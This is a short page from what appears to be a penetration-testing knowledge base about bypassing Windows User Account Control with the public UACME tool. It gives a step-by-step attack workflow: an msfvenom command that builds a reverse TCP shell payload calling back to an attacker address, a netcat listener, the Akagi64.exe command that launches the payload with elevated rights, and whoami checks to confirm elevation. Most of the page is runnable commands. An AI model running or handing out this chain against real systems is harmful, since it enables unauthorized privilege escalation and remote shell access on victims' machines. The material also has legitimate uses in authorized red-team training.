Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / UAC Bypass

UACME

hfiref0x/UACME: Defeating Windows User Account Control is a public collection of UAC bypass techniques.

It is useful for mapping Windows builds and UAC behavior to known bypass methods.

The general workflow is:

  1. Identify the target build
  2. Review available UACME methods
  3. Select a method matching the build and configuration
  4. Execute a controlled payload
  5. Verify elevated execution

Generate a payload (or a Beacon from your favorite C2..):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe -o payload.exe

Start a listener:

nc -lvnp 4444

Execute UACME with the selected method:

Akagi64.exe <method_id> C:\Temp\payload.exe

Verify the resulting context:

whoami
whoami /groups

UACME method IDs are build-dependent. Do not blindly run a random method and assume it will work.